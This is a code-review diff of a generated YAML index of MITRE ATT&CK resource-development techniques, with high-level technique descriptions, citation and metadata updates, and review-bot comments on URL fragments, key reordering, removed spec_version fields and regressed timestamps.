Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
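Review bot: the new `GWS Apps Script Abuse 2021` reference carries a `#google_vignette` fragment in its `url:`; that suffix is an interstitial-ad anchor the browser appends, not part of the article address, and it would be emitted verbatim wherever the citation is rendered. Trim it to `url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/`; if the value is copied as-is from the upstream ATT&CK bundle, the fix belongs upstream and this generated line should follow it. The rest of the hunk is consistent: the `(Citation: GWS Apps Script Abuse 2021)` token added to the Serverless description now resolves, and `x_mitre_attack_spec_version` moves to 3.2.0 alongside the `x_mitre_version` bump to '1.1'.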
@@ -51404,17 +52086,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -51467,11 +52148,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -51507,7 +52187,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -51556,43 +52236,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
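Review bot: the block removed from the top of T1588.004 (platforms, domains, marking refs, `id`, `type`, `created`, `created_by_ref` and the five `external_references` entries) is not deleted; it is re-emitted at the bottom of the object in the following hunk, so this is a key-ordering change rather than a content change. Walking the two copies, all five references survive (mitre-attack, DiginotarCompromise, Recorded Future Beacon Certificates, Splunk Kovar Certificates 2017, Let's Encrypt FAQ), with the Recorded Future entry gaining the updated `https://www.recordedfuture.com/research/cobalt-strike-servers` URL and a September 16, 2024 retrieval date, and `revoked: false` plus `x_mitre_deprecated: false` are added. If the generator now sorts keys, note that in the PR description so reviewers of later regenerations expect one-off moves like this instead of reading them as dropped data.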
@@ -51605,18 +52254,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
@@ -51638,7 +52318,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -51654,8 +52334,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
@@ -51677,7 +52355,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -51697,8 +52375,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -51737,7 +52413,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -51758,8 +52434,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -51789,7 +52463,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -51826,8 +52500,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -51849,7 +52521,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -51871,8 +52543,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -51909,7 +52579,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -51931,8 +52601,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -51994,7 +52662,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -52016,7 +52683,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52034,8 +52701,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -52070,7 +52735,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52089,33 +52754,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
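Review bot: the updated Cloud Accounts description adds two citation tokens, `(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)` and `(Citation: Netcraft SendGrid 2024)`, which each need a matching `source_name` under `external_references`; the following hunk adds both, so the tokens resolve. The remainder of this hunk is key reordering (the `x_mitre_contributors` block with Francesco Bigarella moves up, `x_mitre_platforms` and `x_mitre_is_subtechnique` move down) plus the `x_mitre_version` bump to '1.1'; `atomic_tests` stays empty, so no test mapping changes.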
@@ -52125,10 +52788,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -52136,9 +52808,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
@@ -52189,11 +52860,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52206,7 +52876,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -52241,22 +52911,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
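Review bot: the new closing paragraph of the Domains description (registering a domain through Route53 and creating hosted zones inside a compromised AWS environment) describes an action performed in a victim's cloud account, while the object keeps `x_mitre_platforms: - PRE` in the following hunk and `atomic_tests: []` stays empty. That text is upstream ATT&CK content, so nothing to change in this generated file, but it is worth flagging for whoever maintains the cloud atomics, since unlike the rest of this sub-technique it points at activity a target organization can log and detect. The `(Citation: Invictus IR DangerDev 2024)` token resolves against the reference added two hunks below, and the blank lines inserted between the paragraphs are valid inside the `|-` block scalar.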
@@ -52277,7 +52950,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -52316,6 +52989,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52371,7 +53048,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
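Review bot: `spec_version: '2.1'` is removed from every technique object in this diff (this hunk and each of the following single-line deletions) without the PR text explaining why. `spec_version` is a required property on STIX 2.1 objects, so anything downstream that re-serialises these `technique:` blocks as STIX will fail validation on the regenerated data; if the index generator now strips it deliberately (the other STIX-level keys such as `type`, `id` and `created` are kept), say so in the PR description and in the generator's changelog.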
@@ -52429,7 +53105,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -52509,7 +53184,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -52569,7 +53243,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -52591,7 +53264,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
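Review bot: `modified` moves backwards here, from '2022-04-25T14:00:00.188Z' to '2021-10-17T16:15:52.805Z', and the same regression recurs below for T1586, T1584.005, T1585.001, T1587.004, T1608.003 and T1584.002. The old values all share the same `14:00:00.188Z` time of day, which suggests they were bulk-stamped rather than read from the source bundle, so the earlier timestamps are probably the authentic ones; please state that in the PR description so the regression is not mistaken for a stale data source.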
